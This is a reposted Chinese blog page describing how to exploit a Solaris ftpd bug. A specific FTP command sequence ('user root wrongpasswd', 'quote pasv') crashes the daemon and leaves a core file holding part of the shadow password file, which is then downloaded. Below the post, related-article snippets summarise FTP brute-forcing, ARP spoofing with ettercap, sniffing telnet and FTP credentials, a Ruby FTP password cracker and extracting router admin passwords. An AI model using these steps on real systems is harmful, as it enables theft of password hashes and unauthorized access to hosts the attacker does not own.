用FTP获得密码

最新推荐文章于 2023-04-09 12:23:17 发布
转载 最新推荐文章于 2023-04-09 12:23:17 发布 · 166 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://yq.aliyun.com/articles/420882
文章标签:

#操作系统

本文介绍了一个Solaris操作系统中FTPD服务的漏洞利用方法,通过特定命令序列可获取系统的口令文件,对系统安全造成威胁。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。
 
具体过程如下: 

1.通过 ftp 正常登录到目的主机上 
2.输入如下命令序列: 
ftp> user root wrongpasswd 
ftp> quote pasv 

3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。 

4.再次进入FTP >get core 
 
 
补充:
 
虽然在core只有一部分shadow,
但是对于系统来说已经是致命的打击了 
这是我知道的一个方法~ 











本文转自starger51CTO博客,原文链接: http://blog.51cto.com/starger/19659,如需转载请自行联系原作者

爆破FTP服务器并尝试获取可用的FTP登录用户名称与密码
CoffeMilk的博客
12-10 1137
我们在虚拟测试环境下进行局部渗透测试的时候,发现了FTP服务器,此时我们想要查看操作该FTP服务器,但是需要用户名称和密码,我们就可以尝试使用猜测用户名称和密码的方式去尝试登录;如果存在一些弱口令或常见用户密码则可以登录上FTP服务器进行后续的操作。
winows服务器的ftp密码如何修改,windows服务器iis修改ftp密码
weixin_29026443的博客
08-05 1405
windows服务器iis修改ftp密码 内容精选换一换该任务指导用户修改客户端SNMP v3协议告警上报帐号的密码,以提升系统运维安全性。已获取管理控制台的登录帐号和密码。已获取服务器的登录帐号和密码。本节介绍如何修改安装在Windows操作系统和Linux操作系统的客户端的SNMPv3告警上报帐号密码。客户端SNMP v3的授权认证密码和数据加密密码设置为相同密码时,存在安全风险,为了确保对于...
ftp捕获抓取密码
m0_68976043的博客
04-09 541
w将数据包写入文件中,(write the raw packet to file),即将原始数据写入文件,不进行解析。-v 产生详细的输出 eg. ttl id length ,当与-w配合使用时,每10秒钟报告一次捕获的包的数量。-XX以hex和ascii格式显示data内容,同时还包含了链路层的头部信息。第五步:在另一个服务器上面安装ftp服务器。-r读取tcpdump文件,与-w配合使用。第八步:启动第二个客户端看是否捕获。其中,-i选择监听的网络界面,第六步:安装抓包软件。第七步:开启端口抓包。
利用ftp***拿linux的root密码
weixin_34061482的博客
05-07 291
测试环境:服务器系统:centos5.2 软件环境:vsftpd测试过程描述:利用vsftpd开放的匿名或者弱口令ftp帐户提升root权限(udev未更新)测试过程使用的环境:ubuntu9.0 +火狐浏览器一次偶然的机会发现vsftpd利用若口令提升为root权限,大家可以去研究实现方法:1. 默认vsftpd是开放匿名访问,或者使用软件扫描若口令2. 默认管理linux...
获取HG526超级密码
feijiutong的专栏
01-20 2万+
(*注:文章转自 wzy0309 http://blog.youkuaiyun.com/wzy0309/article/details/6918012 的博客   再次感谢分享)   需要工具:         一个u盘                      (只要能存下16KB文件的就可以了,貌似现在是个U盘就可以哦,空白的盘)         HG526 备份文件加密解密工具   (下载地址附
winscp 500 Unknown command.
与望
05-16 2798
引言 写了个自动上传的脚本,在测试我的主机时使用的是sftp协议是OK的,但是换成了公司的主机ftp协议的不行的。 解决 在脚本中有一句命令为: call .... 百度许久,这个报错500 Unknown command无果,换谷歌。 第一个搜索结果指向了 https://winscp.net/forum/viewtopic.php?t=4827 。 链接主要是说,ftp中没有call命令...
arp欺骗,抓取web和ftp用户名和密码-ettercap-运维安全详细笔记
06-30
本文将详细介绍arp欺骗攻击技术的原理和应用,使用ettercap软件实现arp欺骗攻击,抓取web网站和ftp服务器的用户名和密码。通过实验案例,演示如何使用ettercap进行arp欺骗攻击,并抓取用户名和密码。 arp欺骗攻击...
sniffer局域网嗅探telnet和ftp账号密码.pdf
12-05
" Sniffer局域网嗅探Telnet和FTP账号密码" Sniffer是一种网络嗅探工具,可以捕获和分析网络中...* 使用Sniffer Pro可以嗅探Telnet和FTP账号密码,并获取明文密码和用户名 * 该实验步骤可以作为嗅探其他网络协议的参考
使用Ruby实现FTP密码破解
01-02
这篇文章我将带大家利用Ruby,来构建我们自己的FTP密码破解器。并希望通过这个例子,让大家明白暴力攻击的概念及其重要性。好了话不多说,下面让我们开始吧! 何为暴力攻击? 暴力攻击这个词,其实对于许多安全圈的...
ftp连接不上出现500 Invalid PORT Command.错误
05-03
连接到 www.06356666.com, 端口 25 (#1) 解析主机为: 112.125.43.138 已连接. 正等待响应. 220 Microsoft FTP Service USER 123000 331 Password required for 123. PASS xxxxxx 230 User 123 logged in. SYST 215 Windows_NT PWD 257 "/" is current directory. TYPE A 200 Type set to A. PORT 192,168,1,100,17,228 500 Invalid PORT Command. PASV 227 Entering Passive Mode (10,247,80,183,117,51).
FTP显示illegal PORT command 、Unknown Command解决方案
Alanzjl的专栏
04-04 1万+
今天下午用Banana Pi 在宿舍里开FTP服务器,开的时候没有任何问题,结果用电脑上的Archlinux连接的时候,总是提示500 illegal PORT command 、500 Unknown Command。 网上搜了一下,都是讲的PASV和PORT模式切换,我试着做了一下,还是不行。 后来,又用Mac系统连了一下(Arch是虚拟机),发现竟然连接上了,再在Ar
ftplib.error_perm: 500 Unknown command.
VAUBANTENG的博客
06-23 3805
from ftplib import FTP def ftpconnect(): ftp_server = 'xxxxxxxxx' username = 'xxxxxxxxxx' password = 'xxxxxxxxxxxx' ftp = FTP() ftp.set_debuglevel(2) ftp.connect(ftp_server, 21) ftp.login(username, password) return ftp d
FTP获取联通光猫PT952G的管理员密码
weixin_45378201的博客
05-31 1万+
联通光猫PT952G的管理员密码 楼主的光猫配置 设备类型:吉比特(GPON/4+1+WiFi 2.4G ) 设备型号:PT952G 时间:2020-5-31 已获取密码 以下为楼主找到的获取管理员密码的方法: 普通用户的帐号和密码在光猫的背面,我的是92azj3nr 输入光猫网关192.168.1.1即可跳转到登录界面 选择其他用户登录 输入光猫背面的默认终端配置密码登录 登录以后,发现没有可以设置的东西,都没权限,需要管理员密码,默认的管理员密码是cuadmin或CUadmin 我的这个是小
关于移动H3_2s光猫获得超级密码的步骤以及上传本地配置文件覆盖光猫的配置文件的方法
热门推荐
无话可说
01-18 2万+
本文总结了一下如何通过telnet以及tftp获取超级密码以修改光猫设置。
天翼网关刷linux,天翼网关3 友华PT926E通用 全网首发 免复位/TTL/FTP获取超密及根目录方法!(四川已测)...
weixin_39533742的博客
05-13 4243
本帖最后由 浅爱酱 于 2021-1-21 17:01 编辑所需工具:U盘*1 理论适用于 大部分天翼网关3 即便不是这个型号也应该可以提取文件 剩下的就看你自己研究了1. 将准备的U盘插入光猫 U盘内至少应有一个文件夹2020/3/11. 更新 新增跳过2-7步骤方法 请见帖子后半部分.2. 新增 永久开启Telnet的方法,无超级用户也可开启 开启后再获取也不迟 见尾部内容.2. 首先打开光猫...
LeaPFTP密码查看器:轻松获取FTP密码
这意味着,密码查看器并不能保证100%恢复所有密码,其效果取决于所使用的FTP客户端对密码的存储方式和加密强度。 ### 知识点四:汉化说明与本地化问题 汉化说明文件(汉化说明.txt)是该压缩包中的一个文件,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值